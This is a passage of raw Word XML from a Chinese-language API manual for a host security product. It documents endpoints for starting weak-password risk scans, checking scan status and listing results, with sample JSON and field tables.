    </w:p>
    <w:p w14:paraId="50C8F1CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F0AEEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777353B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5FBEB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A236816"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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D0164" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B144C"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76167F92"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57BC081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8290DAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39FEBFFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D17A5A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F3AA441" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46C61A8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="638F0FDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02601290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB4D529" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46625E3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F5B5F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552B2A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>这个api调用前需要先调用4.3.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该风险扫描接口创建job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C760E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69B234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE65ACB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="查询风险扫描执行状态-2"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:t>查询风险扫描执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235F8C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B960518" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/weakpwd/{linux|win}/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E4DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F44C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE4011" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C8160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/weakpwd/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C185E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF957B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD66686"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="517399C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5281087" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0EC975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B53731C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B73B856" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E8A8B4B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE0304D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A9EA37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="428B1D91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFA187E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次job执行状态，如果从未执行过job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="140E76EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="查询风险检测结果-2"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询风险检测结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4D178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10148FA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/weakpwd/{linux|win}/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD705AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701B727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:hyperlink w:anchor="基本请求方法">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>基本请求方法</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC565F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA3015" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/weakpwd/linux/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054390F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D069C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5b1edbed7d761b59ad1e7787",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "c7b5cd9f4bd927b7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.2.226",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.2.226",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "qt-System-Product-Name",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTags": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "11111111111111111111111111111111",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "hello world"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "vulId": "QT052016001395",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50934EF6"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1266CB5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E49075D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12AC4604" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7606C903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D5A75D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="681D4FA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C937830" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10768A07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E99F80D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63CDC577" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CCFDA36" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4785A950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBD2E43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA4B621" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02EBD826" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B6027C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CF30A22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D893E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59AE6DFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13BE6CC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B513058" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E1A43B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="256616BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5883506A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40B0D7BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DAE646A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B89322" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F16029" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1202D273" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1150392E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1ADDAF71" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364F1405" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BFD1AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DB5C65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71746F45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49134B6D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45A041D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
